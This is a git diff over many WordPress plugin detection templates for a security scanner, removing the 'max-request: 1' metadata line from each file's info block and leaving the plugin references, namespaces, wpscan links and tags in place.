diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
